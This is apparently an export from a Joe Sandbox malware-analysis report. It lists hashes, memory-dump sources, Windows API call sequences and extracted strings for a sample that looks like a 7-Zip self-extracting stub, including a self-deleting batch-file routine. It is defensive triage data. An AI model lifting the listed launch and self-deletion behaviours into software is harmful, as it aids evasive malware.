                                                      • Instruction ID: d276be45ba9710969d4d69a2fbd68599cb80de3b2bdcae4a446b37c04d3c8c9c
                                                      • Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                      • Instruction Fuzzy Hash: 6A41C360C14B9652EB134F7CC842272B320BFAB244F00D75AFDD179922FB3266446255
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                      • Instruction ID: 6fc8e050a97d926f750d5da14c4a761a5f22703977f0277d1b92a118b0bcd8c9
                                                      • Opcode Fuzzy Hash: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                      • Instruction Fuzzy Hash: 2F212E7B370D4607EB0C8939AE336BE2582E340346F88953DD247C5784EE9E9954810D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                      • Instruction ID: 593f74aba8cbd25357504dd2d18fce0fb38989f15731237b119c96727be92a00
                                                      • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                      • Instruction Fuzzy Hash: 7521C53291462547CB02CE6EE4845A7F392FFC436BF174767ED8467290C629A85486E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                      • Instruction ID: f31e75e8446499c6638a38678b48eff386f2da62f80cbfd2527233499c21bf4b
                                                      • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                      • Instruction Fuzzy Hash: 21213B7291842587C701DF1DE4886B7B3E1FFC431AF678A3BD9828B182C638E885D794
                                                      APIs
                                                      • GetCommandLineW.KERNEL32(?,?,?), ref: 0040505F
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00405122
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 0040512A
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00405132
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 0040513A
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 00405142
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040514A
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 00405152
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040515A
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00405162
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040516A
                                                      • GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405183
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004051AA
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004051B4
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004051BF
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004051C7
                                                      • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004051DC
                                                      • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004051F3
                                                      • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00405203
                                                      • SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00405224
                                                      • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040522D
                                                      • GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040524C
                                                      • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405255
                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040525C
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040526B
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00405274
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040527F
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0040528B
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00405292
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040529D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                      • String ID: " -$sfxwaitall
                                                      • API String ID: 2734624574-3991362806
                                                      • Opcode ID: 09ebb3d538a5a8633bfcfd653b7b7202ebab26aa0208b363f6e46b16e2ca7b16
                                                      • Instruction ID: b3327515afe2f0509fed3fa0d446ddd4546a9b02c844584286d91d1d95b89973
                                                      • Opcode Fuzzy Hash: 09ebb3d538a5a8633bfcfd653b7b7202ebab26aa0208b363f6e46b16e2ca7b16
                                                      • Instruction Fuzzy Hash: 73614DB2800148BBDF11BFA1DC45EDF3B6CFF54308F10853AFA15A21A1DA399A559F68
                                                      APIs
                                                      • GetDriveTypeW.KERNEL32(?,?,00000000), ref: 0040534B
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040537C
                                                      • WriteFile.KERNEL32(00419858,?,?,00406D05,00000000,del ",:Repeat,00000000), ref: 00405431
                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040543C
                                                      • CloseHandle.KERNEL32(00419858), ref: 00405445
                                                      • SetFileAttributesW.KERNEL32(00406D05,00000000), ref: 0040545C
                                                      • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040546E
                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405477
                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405483
                                                      • ??3@YAXPAX@Z.MSVCRT(00406D05,?), ref: 00405489
                                                      • ??3@YAXPAX@Z.MSVCRT(00406D05,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00406D05,00419858), ref: 004054B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                      • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                      • API String ID: 3007203151-3467708659
                                                      • Opcode ID: 592e6a1c6e1d38efc50c661a525fe8aff8731a4a0da7546c5a3d4b9ca7fa2448
                                                      • Instruction ID: d0d69a7dd8ff82dd971fb120c5bc6d20105d604efb913bdcb2d31d3208e79299
                                                      • Opcode Fuzzy Hash: 592e6a1c6e1d38efc50c661a525fe8aff8731a4a0da7546c5a3d4b9ca7fa2448
                                                      • Instruction Fuzzy Hash: 8E418E31C00109BADB11ABA0DC86DEF7779EF14319F50802AF515761E1EB785E86DB68
                                                      APIs
                                                      • GetClassNameA.USER32(?,?,00000040), ref: 00403140
                                                      • lstrcmpiA.KERNEL32(?,STATIC), ref: 00403153
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00403160
                                                        • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                        • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040318D
                                                      • GetParent.USER32(?), ref: 0040319B
                                                      • LoadLibraryA.KERNEL32(riched20), ref: 004031AF
                                                      • GetMenu.USER32(?), ref: 004031C2
                                                      • SetThreadLocale.KERNEL32(00000419), ref: 004031CF
                                                      • CreateWindowExW.USER32(00000000,RichEdit20W,004154C8,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004031FF
                                                      • DestroyWindow.USER32(?), ref: 00403210
                                                      • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00403225
                                                      • GetSysColor.USER32(0000000F), ref: 00403229
                                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00403237
                                                      • SendMessageW.USER32(00000000,00000461,?,?), ref: 00403262
                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403267
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040326F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                      • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                      • API String ID: 3514532227-2281146334
                                                      • Opcode ID: 649788af889b09317d6ffdec884ca6b8992534c431825e7763816d5c9685ffe6
                                                      • Instruction ID: 373b527b6ca097a0cf97d4fb6958eb329f6bb70dd43407f4b4eeb9307f1859e1
                                                      • Opcode Fuzzy Hash: 649788af889b09317d6ffdec884ca6b8992534c431825e7763816d5c9685ffe6
                                                      • Instruction Fuzzy Hash: 61319E72900509FFDB01AFA4DC49EEF7BBDAF48716F108036F605F6190DA788A418B68
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                      • LoadIconW.USER32(00000000), ref: 00408717
                                                      • GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                      • GetSystemMetrics.USER32(00000031), ref: 00408730
                                                      • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                      • LoadImageW.USER32(00000000), ref: 0040873C
                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                      • GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                      • GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                      • GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                      • GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                      • GetWindow.USER32(?,00000005), ref: 004088C3
                                                      • GetWindow.USER32(?,00000005), ref: 004088DF
                                                      • GetWindow.USER32(?,00000005), ref: 004088F7
                                                      • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00408AB5), ref: 00408957
                                                      • LoadIconW.USER32(00000000), ref: 0040895E
                                                      • GetDlgItem.USER32(?,000004B1), ref: 0040897D
                                                      • SendMessageW.USER32(00000000), ref: 00408980
                                                        • Part of subcall function 00407B0D: GetDlgItem.USER32(?,?), ref: 00407B17
                                                        • Part of subcall function 00407B0D: GetWindowTextLengthW.USER32(00000000), ref: 00407B1E
                                                        • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                        • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                      • String ID:
                                                      • API String ID: 3694754696-0
                                                      • Opcode ID: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                      • Instruction ID: ec505544c7bb35dede6d5bcefb07895398d021ded876e535e02418492f258e54
                                                      • Opcode Fuzzy Hash: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                      • Instruction Fuzzy Hash: D671F8B1344705ABE6117B619E4AF3B7659DB80714F10443EF6827A2E2CFBCAC018A5E
                                                      APIs
                                                      • lstrcmpiW.KERNEL32(00000000,004166B8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404BE2
                                                        • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                        • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                        • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                        • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                        • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                        • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                        • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                        • Part of subcall function 00402187: lstrcmpiW.KERNEL32(009B8FD0,00404926), ref: 0040224B
                                                        • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(009B8FD0), ref: 0040225B
                                                        • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                        • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                        • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                        • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                      • _wtol.MSVCRT ref: 00404CDF
                                                      • _wtol.MSVCRT ref: 00404CFB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                      • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle
                                                      • API String ID: 2725485552-1675048025
                                                      • Opcode ID: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                      • Instruction ID: efab4658e061a586f4080eb8d96ca385680a2b42527defa3ddb57561e196b8fa
                                                      • Opcode Fuzzy Hash: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                      • Instruction Fuzzy Hash: F151B8F6E01104BADB11AF616D8ADEF36ACDE41708725443FF904F22C2E6BD8E85466D
                                                      APIs
                                                      • GetWindowDC.USER32(00000000), ref: 00401EBE
                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                      • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                      • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                      • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                      • CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                      • CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                      • SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                      • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                      • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                      • GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                      • SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                      • SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                      • DeleteDC.GDI32(00000000), ref: 00401FAC
                                                      • DeleteDC.GDI32(00000000), ref: 00401FAF
                                                      • ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                      • ReleaseDC.USER32(00000000,?), ref: 00401FC5
                                                      • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401FD2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                      • String ID:
                                                      • API String ID: 3462224810-0
                                                      • Opcode ID: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                      • Instruction ID: f87cdcd409c0e6d8f104c470e9418599ce0c3db21cc9cfda4b735dde8093d4f2
                                                      • Opcode Fuzzy Hash: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                      • Instruction Fuzzy Hash: B0310676D40208FFDF115BE1DD48EEF7FB9EB88761F108066FA04A61A0C6754A50AFA4
                                                      APIs
                                                      • GetClassNameA.USER32(?,?,00000040), ref: 00401FEF
                                                      • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402006
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00402019
                                                      • GetMenu.USER32(?), ref: 0040202E
                                                        • Part of subcall function 00401DC9: GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                        • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                        • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                        • Part of subcall function 00401DC9: SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                        • Part of subcall function 00401DC9: LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                        • Part of subcall function 00401DC9: LockResource.KERNEL32(00000000), ref: 00401E2B
                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402060
                                                      • memcpy.MSVCRT(00000000,00000000,00000010), ref: 0040206D
                                                      • CoInitialize.OLE32(00000000), ref: 00402076
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402082
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00416E50,?), ref: 004020A7
                                                      • GlobalFree.KERNEL32(00000000), ref: 004020B7
                                                        • Part of subcall function 00401EB2: GetWindowDC.USER32(00000000), ref: 00401EBE
                                                        • Part of subcall function 00401EB2: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                        • Part of subcall function 00401EB2: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                        • Part of subcall function 00401EB2: GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                        • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                        • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                        • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                        • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                        • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                        • Part of subcall function 00401EB2: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                        • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                        • Part of subcall function 00401EB2: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                        • Part of subcall function 00401EB2: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                        • Part of subcall function 00401EB2: GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                        • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                        • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                        • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAC
                                                        • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAF
                                                        • Part of subcall function 00401EB2: ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 004020E9
                                                      • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004020FD
                                                      • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 0040210F
                                                      • GlobalFree.KERNEL32(00000000), ref: 00402124
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                      • String ID: IMAGES$STATIC
                                                      • API String ID: 4202116410-1168396491
                                                      • Opcode ID: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                      • Instruction ID: 87364bf851807a9d3783278cfb79ffb10547d227827cc6f6944e766e6ae994b9
                                                      • Opcode Fuzzy Hash: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                      • Instruction Fuzzy Hash: 00418F31900108FFCB119FA0DC4CEEF7F79EF49741B008065FA05A61A0D7798A55DB64
                                                      APIs
                                                        • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                        • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                      • GetDlgItem.USER32(?,000004B8), ref: 00408B63
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408B72
                                                      • GetDlgItem.USER32(?,000004B5), ref: 00408BB9
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00408BBE
                                                      • GetDlgItem.USER32(?,000004B5), ref: 00408BCE
                                                      • SetWindowLongW.USER32(00000000), ref: 00408BD1
                                                      • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408BF7
                                                      • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408C09
                                                      • GetDlgItem.USER32(?,000004B4), ref: 00408C13
                                                      • SetFocus.USER32(00000000), ref: 00408C16
                                                      • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408C45
                                                      • CoCreateInstance.OLE32(00416E80,00000000,00000001,00416B08,?), ref: 00408C69
                                                      • GetDlgItem.USER32(?,00000002), ref: 00408C86
                                                      • IsWindow.USER32(00000000), ref: 00408C89
                                                      • GetDlgItem.USER32(?,00000002), ref: 00408C99
